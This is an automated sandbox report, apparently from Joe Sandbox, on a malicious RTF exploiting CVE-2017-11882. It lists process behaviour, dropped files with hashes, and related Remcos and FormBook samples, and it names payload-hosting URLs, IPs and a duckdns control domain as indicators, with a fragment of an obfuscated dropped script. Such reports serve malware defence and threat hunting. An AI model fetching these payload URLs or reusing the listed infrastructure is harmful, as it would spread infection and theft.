                                                      Sample name:SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtf
                                                      Detection:MAL
                                                      Classification:mal100.rans.troj.spyw.expl.evad.winRTF@10/19@470/3
                                                      EGA Information:
                                                      • Successful, ratio: 50%
                                                      HCA Information:
                                                      • Successful, ratio: 97%
                                                      • Number of executed functions: 62
                                                      • Number of non-executed functions: 194
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .rtf
                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                      • Attach to Office via COM
                                                      • Scroll down
                                                      • Close Viewer
                                                      • Override analysis time to 79898.6860760828 for current running targets taking high CPU consumption
                                                      • Override analysis time to 159797.372152166 for current running targets taking high CPU consumption

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                                      • Execution Graph export aborted for target EQNEDT32.EXE, PID 3420 because there are no executed function
                                                      • Execution Graph export aborted for target powershell.exe, PID 3628 because it is empty
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • VT rate limit hit for: SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtf

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      08:00:09API Interceptor62x Sleep call for process: EQNEDT32.EXE modified
                                                      08:00:12API Interceptor6x Sleep call for process: wscript.exe modified
                                                      08:00:13API Interceptor91x Sleep call for process: powershell.exe modified
                                                      08:00:19API Interceptor6550785x Sleep call for process: RegAsm.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      207.241.227.96lDQ1o9VCIE.rtfGet hashmaliciousRemcosBrowse
                                                        receipt#295.vbsGet hashmaliciousUnknownBrowse
                                                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.22323.26667.rtfGet hashmaliciousRemcosBrowse
                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.14512.27571.rtfGet hashmaliciousRemcosBrowse
                                                              xnHel.rtfGet hashmaliciousRemcosBrowse
                                                                INV_00983.xlsGet hashmaliciousRemcosBrowse
                                                                  Enquiry.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                    RFQ_0230909024SEPT.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                      xrrwwstCMd.docxGet hashmaliciousRemcosBrowse
                                                                        192.3.101.2917265825068238c1f4fae0310a1dd9b487dd8dd6291b4cd61b7c813cd66f4593f2833d6c21905.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                          RFQ PO-DF9087.vbsGet hashmaliciousRemcosBrowse
                                                                            PO_NODF9087.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                              PO_NODF9087.xla.xlsxGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                RFQ_0230909024SEPT.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                                  SWIFT050924.vbsGet hashmaliciousRemcosBrowse
                                                                                    Revised SOA-INV023010924.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                                      RFQ_0030829024SEPT.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.9070.28632.rtfGet hashmaliciousRemcosBrowse
                                                                                          PMT-INV0230824AUG.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                                            185.235.137.223eMJ2QgQF4u.rtfGet hashmaliciousFormBookBrowse
                                                                                            • 185.235.137.223/90/seethedifferentofpicture.vbs
                                                                                            QT2Q1292.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                            • 185.235.137.223/90/seethedifferentofpicture.vbs
                                                                                            RFQ_0230909024SEPT.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                                            • 185.235.137.223/200/NRSCER.txt
                                                                                            buttersmoothcrashcandy.rtfGet hashmaliciousUnknownBrowse
                                                                                            • 185.235.137.223/69/shoppingfestivalsessiononherewithyou.tIF

                                                                                            Domains

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            ia601706.us.archive.orglDQ1o9VCIE.rtfGet hashmaliciousRemcosBrowse
                                                                                            • 207.241.227.96
                                                                                            receipt#295.vbsGet hashmaliciousUnknownBrowse
                                                                                            • 207.241.227.96
                                                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.22323.26667.rtfGet hashmaliciousRemcosBrowse
                                                                                            • 207.241.227.96
                                                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.14512.27571.rtfGet hashmaliciousRemcosBrowse
                                                                                            • 207.241.227.96
                                                                                            xnHel.rtfGet hashmaliciousRemcosBrowse
                                                                                            • 207.241.227.96
                                                                                            INV_00983.xlsGet hashmaliciousRemcosBrowse
                                                                                            • 207.241.227.96
                                                                                            Enquiry.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                            • 207.241.227.96
                                                                                            RFQ_0230909024SEPT.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                                            • 207.241.227.96
                                                                                            xrrwwstCMd.docxGet hashmaliciousRemcosBrowse
                                                                                            • 207.241.227.96
                                                                                            camzeroconnect.duckdns.org17265825068238c1f4fae0310a1dd9b487dd8dd6291b4cd61b7c813cd66f4593f2833d6c21905.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                            • 192.3.101.29
                                                                                            PO_NODF9087.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                            • 192.3.101.29
                                                                                            PO_NODF9087.xla.xlsxGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                            • 192.3.101.29
                                                                                            RFQ_0230909024SEPT.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                                            • 192.3.101.29
                                                                                            SWIFT050924.vbsGet hashmaliciousRemcosBrowse
                                                                                            • 192.3.101.29

                                                                                            ASNs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            INTERNET-ARCHIVEUSRFQ 2024.09.26-89 vivecta.vbsGet hashmaliciousPureLog StealerBrowse
                                                                                            • 207.241.227.240
                                                                                            AGMETIGA zapytanie ofertowe.xlsGet hashmaliciousPureLog StealerBrowse
                                                                                            • 207.241.227.240
                                                                                            REQUEST FOR QUOTATION.jsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                                                                            • 207.241.235.61
                                                                                            sostener.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                            • 207.241.227.240
                                                                                            asegurar.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                            • 207.241.227.240
                                                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                            • 207.241.227.240
                                                                                            http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comGet hashmaliciousUnknownBrowse
                                                                                            • 207.241.237.3
                                                                                            LJ1IZDkHyE.htaGet hashmaliciousCobalt Strike, Remcos, PureLog StealerBrowse
                                                                                            • 207.241.227.240
                                                                                            hnvc.vbsGet hashmaliciousPureLog StealerBrowse
                                                                                            • 207.241.227.240
                                                                                            wm.vbsGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                                            • 207.241.227.240
                                                                                            AFRARASAIReMJ2QgQF4u.rtfGet hashmaliciousFormBookBrowse
                                                                                            • 185.235.137.223
                                                                                            QT2Q1292.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                            • 185.235.137.223
                                                                                            RFQ_0230909024SEPT.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                                            • 185.235.137.223
                                                                                            buttersmoothcrashcandy.rtfGet hashmaliciousUnknownBrowse
                                                                                            • 185.235.137.223
                                                                                            SecuriteInfo.com.Linux.Siggen.9999.15938.22369.elfGet hashmaliciousMiraiBrowse
                                                                                            • 185.49.104.3
                                                                                            an3gpDV7uW.exeGet hashmaliciousLummaCBrowse
                                                                                            • 185.235.137.54
                                                                                            paTWrNAira.exeGet hashmaliciousLummaCBrowse
                                                                                            • 185.235.137.54
                                                                                            2gQsoHaGEm.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                                            • 185.235.137.54
                                                                                            xvJv1BpknZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                                            • 185.235.137.54
                                                                                            PxuZ1WpCgf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                                            • 185.235.137.54
                                                                                            AS-COLOCROSSINGUSPO.xlsGet hashmaliciousRemcosBrowse
                                                                                            • 104.168.32.148
                                                                                            GEsD6lobvy.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                                            • 172.245.123.6
                                                                                            Shipping Document.docx.docGet hashmaliciousUnknownBrowse
                                                                                            • 104.168.32.148
                                                                                            Payment Advice.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 172.245.123.6
                                                                                            AGMETIGA zapytanie ofertowe.xlsGet hashmaliciousPureLog StealerBrowse
                                                                                            • 107.172.130.147
                                                                                            Purchase Inquiry-0012.xlsGet hashmaliciousUnknownBrowse
                                                                                            • 192.3.220.20
                                                                                            REMITTANCE ADVICE.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 172.245.123.6
                                                                                            Purchase Inquiry-0012.xlsGet hashmaliciousUnknownBrowse
                                                                                            • 192.3.220.20
                                                                                            Purchase Inquiry-0012.xlsGet hashmaliciousUnknownBrowse
                                                                                            • 192.3.220.20
                                                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtfGet hashmaliciousRemcosBrowse
                                                                                            • 107.172.130.147

                                                                                            JA3 Fingerprints

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            05af1f5ca1b87cc9cc9b25185115607dPO.xlsGet hashmaliciousRemcosBrowse
                                                                                            • 207.241.227.96
                                                                                            Shipping Document.docx.docGet hashmaliciousUnknownBrowse
                                                                                            • 207.241.227.96
                                                                                            Payment Advice.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 207.241.227.96
                                                                                            AGMETIGA zapytanie ofertowe.xlsGet hashmaliciousPureLog StealerBrowse
                                                                                            • 207.241.227.96
                                                                                            QT2Q1292.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                            • 207.241.227.96
                                                                                            REMITTANCE ADVICE.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 207.241.227.96
                                                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtfGet hashmaliciousRemcosBrowse
                                                                                            • 207.241.227.96
                                                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                            • 207.241.227.96
                                                                                            Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 207.241.227.96
                                                                                            Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 207.241.227.96

                                                                                            Dropped Files

                                                                                            No context

                                                                                            Created / dropped Files

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):4760
                                                                                            Entropy (8bit):4.834060479684549
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                                                                            MD5:838C1F472806CF4BA2A9EC49C27C2847
                                                                                            SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                                                                                            SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                                                                            SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                                                                            Malicious:false
                                                                                            Reputation:moderate, very likely benign file
                                                                                            Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):64
                                                                                            Entropy (8bit):0.34726597513537405
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Nlll:Nll
                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                            Malicious:false
                                                                                            Reputation:high, very likely benign file
                                                                                            Preview:@...e...........................................................

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\someimportantmeetingsgoing[1].tiff

                                                                                            Download File
                                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):207544
                                                                                            Entropy (8bit):3.8530934094159677
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:Uo4M7xayz1mE9/y/33+Fgt5p2GwKA6Tr0mduBbVXZ1mpt/k0B1rpYErnFrjP:Uo4M7Mo1mE9o3+RmduDy/k0vpYErn1P
                                                                                            MD5:8BD63BBD24B0B095F3FC481D42FE6205
                                                                                            SHA1:7FB55D0D9D571874C9310A89DB9D23537B43679C
                                                                                            SHA-256:06E9CC594AC61828036FEBA1C86C400BB90AFCDBEC0214C6A1F790EBF32BD615
                                                                                            SHA-512:8429218E158794B86CCB703B3DC41D02CB3E91021DF6F95FE2740DAD2A97B9A7CF2CDD338DF0456AA4E1E5B4393A7A4E968C79839B23F565FFD40A7608042F3B
                                                                                            Malicious:false
                                                                                            Preview:..i.L.i.k.L.L.U.P.A.L.s.b.x.b. .=. .".T.k.b.m.U.K.s.G.n.f.d.z.b.e.".....G.z.e.W.G.n.p.i.x.O.i.L.x.P. .=. .".f.t.K.W.Z.Q.d.L.K.i.N.i.H.n.".....Q.W.W.G.K.v.K.T.N.O.z.h.e.t. .=. .".C.L.Q.W.v.e.J.L.u.B.j.e.f.L.".....O.v.L.k.i.t.Q.O.N.u.G.m.J.K. .=. .".n.K.R.q.i.p.C.g.z.o.e.P.c.k.".....K.t.G.H.C.L.P.W.i.G.c.v.c.q. .=. .".L.L.k.c.G.K.L.L.q.L.q.x.m.U.".....k.c.u.U.m.e.W.x.W.l.s.W.h.P. .=. .".p.c.a.S.R.L.C.c.v.g.G.m.l.W.".....U.L.a.Z.C.k.Z.k.G.L.L.Z.h.q. .=. .".K.c.P.U.Q.i.p.c.q.W.L.q.L.W.".....c.c.c.i.G.o.O.G.n.R.e.h.e.m. .=. .".C.o.d.L.B.L.G.z.U.A.O.e.P.u.".....K.a.l.h.k.c.k.i.o.N.G.k.t.n. .=. .".Z.U.O.z.f.N.o.L.i.q.S.K.b.S.".....W.A.N.R.l.t.G.L.c.i.b.p.H.p. .=. .".L.u.K.t.e.k.b.W.o.G.J.t.L.d.".........k.q.l.O.A.h.L.b.i.C.G.i.G.u. .=. .".W.O.L.W.t.K.G.c.K.W.K.h.T.z.".....T.f.j.r.U.O.a.K.i.A.Q.x.U.a. .=. .".L.e.A.d.U.f.G.U.K.x.h.h.W.B.".....L.b.m.W.W.c.d.W.x.C.z.x.K.x. .=. .".P.P.B.r.W.f.H.i.e.T.n.H.f.G.".....L.W.Q.U.u.G.R.W.W.i.i.u.i.f. .=. .".C.K.A.t.m.a.L.Z.P.O.R.R.R.c.".....k.Z.K.P.u.K.x.

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{07782794-9C99-45A3-9EF6-DEC334E5B758}.tmp

                                                                                            Download File
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                            Category:dropped
                                                                                            Size (bytes):8192
                                                                                            Entropy (8bit):4.91156901700462
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:JCJZMPyFgpIk/q6Mi0XKHjFZgMPZjFg0k/q6Mi0XKHjF:JlPgI3MhKHp3PXm3MhKHp
                                                                                            MD5:7EF965EAC690A13E3058B526117313B8
                                                                                            SHA1:27B02DD1E2A5EC089A067C85BE0B288C13E00AE4
                                                                                            SHA-256:3441B02E659AFFCF7E133554F6D326F8B52E2BD2AB4C7048DA7952DEF5606A04
                                                                                            SHA-512:F8F7769B4F061994E0B1335938B39BBC981DF8F223DB924427E707C3DFADFB748A7257C1F1DD72FC1E0386D1E9BAD281AF4EE011D2F5EA9BA7372685E32E04E5
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{71ECB647-C679-4AF5-A11B-A4AE727466EF}.tmp

                                                                                            Download File
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):10752
                                                                                            Entropy (8bit):3.5098974218782746
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:Drl1IwMH1vf4SYVSwfJGZFEw5hqtCEO2npDXzF9QKvs9hDHdPbrD98W5tQmZ:Drl18V9efJGZCshuHpPDslftQmZ
                                                                                            MD5:40B0C6B735851D9120DC1AB5E2308072
                                                                                            SHA1:3E60F94853ABC810D70EED2944337B66DAB0E103
                                                                                            SHA-256:C356C63FB3E0075191044241212A1230CDD7AE7CF513875C335F7304107C00DA
                                                                                            SHA-512:B2E859F717074D934FC13165B5593E722E3E6BA73FA9D41FE613B6F4035F24DF4E0504590FDE7A54C147E11EBA4EC3CACA55993F7F99AD0A8C9AEA7B01DE2579
                                                                                            Malicious:false
                                                                                            Preview:......5.9.4.6.3.6.1.5.@.!.5.9.=.7.,...-.:.].).?.3.(.).].#.9.8.^.[.2.-.%.5...<.;.6...|...2.#.9.5.*.]._.@.%.@.:.'.;.&.=.?./.>.?.1.<._.~.?.?.>._.?./.:.>.9.?.?.].%.'.^.?.2.=.6.,...(.?.#.:.6.!.~./...%.].$.).8.<.!.:...`.?...4.'.;.(.%.1.<.+.].<...-.+.&.(.(.,.`...!.9.].7.(.3.`.^.1.%...^...?.$.|.=.#.(.@.|.|.../.0.1.?.?.=.9.?.0.1.,.%.?./.6.>.?.1.;.=.?.$.,...5.6.%.?.+.(.5.?./.%.*.>.@.6.=.(._.,.1...~.^...#.?.4.`.$.&.$.+.?.?.).1.?...=.(.].=.%.7.`.?.%.#...'.].^.$.&.;.>...[.^.[.?.?.4.%.-.9.4.6.:.&.3.~.?.?...).*.=.9.!.&.0...%.%.5.;.[.2.`.8.|.^.^./.?.*.&...6.1.=.|.?.>.:.).?.(...5.(.?.7.8.<.$.`.7.>.4.].:.%.(.%.<.@.?.1.].3.|.-.=.[.?.^.^.!.!.4.8.+.2.9.-.5./.=.*.|.[.%.?._._.).!.;.<.%.?.<.+...0.(.3.,.9.?.2.?._.-.`.6.%./.:.,.1.-.=.?.>.^.%.?.).?...[.=.[.|.?.$.&.*.$.9.;.4.&.?.~.$./.?...|...?.(.1.`...;.[.@._.%.*.^...(.[.?.?.;.~.$.?.;...%.(./.!.%.@.?.6.,.~.:.?.%.'.9.6.|.?.......$.=.&.,.=...(.9...`...>.!.5.@.3.].&.$.0.?.%.].6.4.5.4.|.!.[.$...6.).=.`...5.4.%.<.3.?.*.<.<.;.~.*.*.<.!.+.;.6.5.*.?.*.'./._.6.#.:.].:.~.

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8E6B9816-E6D7-4F8D-8737-15144F74AEB9}.tmp

                                                                                            Download File
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1536
                                                                                            Entropy (8bit):1.3586208805849456
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbG:IiiiiiiiiifdLloZQc8++lsJe1MzZn
                                                                                            MD5:0C25F0A9F81F8CD4BB5C7308EA86F519
                                                                                            SHA1:AFB4AC21FA7E568C818235267612628377D2628C
                                                                                            SHA-256:E2B2484784EA5A546E2E22D6F73FDF076CF34187F1C76AF6E6720B0888320FD3
                                                                                            SHA-512:9FFC085CB422FA14F4C46739081AFAEADB9F7CA11CFA696C97D398E0EC79632A3ADB47D43C9A58D460C72F20A56F6D269AF400E68D94DE94286597DC783E7C0C
                                                                                            Malicious:false
                                                                                            Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E26221B0-A38A-46AA-9837-7495B9BE5CE0}.tmp

                                                                                            Download File
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1024
                                                                                            Entropy (8bit):0.05390218305374581
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:ol3lYdn:4Wn
                                                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                            Malicious:false
                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\03vg00kf.x4z.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview:1

                                                                                            C:\Users\user\AppData\Local\Temp\kyzdetn3.xqv.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview:1

                                                                                            C:\Users\user\AppData\Local\Temp\meo10pqm.2ns.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview:1

                                                                                            C:\Users\user\AppData\Local\Temp\r4gzcwaw.4na.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview:1

                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.LNK

                                                                                            Download File
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:08 2023, mtime=Fri Aug 11 15:42:08 2023, atime=Fri Sep 27 11:00:07 2024, length=81974, window=hide
                                                                                            Category:dropped
                                                                                            Size (bytes):1234
                                                                                            Entropy (8bit):4.534819346640586
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:8tujp/XTI54XIjHCdOwew6RHCdOrDv3qZ57u:80V/XTE4YjHCJkHClZ9u
                                                                                            MD5:E67BA2A8B3ABB1D179B8CCF9CDD08E4A
                                                                                            SHA1:F4F2609CF2C0F2C5DF61328B1CCD324590772548
                                                                                            SHA-256:98AF90AB74C79CDE43C22BDF6B8FD53C99A821C6A05579A3618D08F5F74107AD
                                                                                            SHA-512:719A2BCC3F5C50E31544BABC3C243DE04EBA1CB031E4C56DD5B7D002160C1C8DAAB15EA4969652B3CA4503202EBD5860720672E9B49BD97C81ABBAE3C76C57EF
                                                                                            Malicious:false
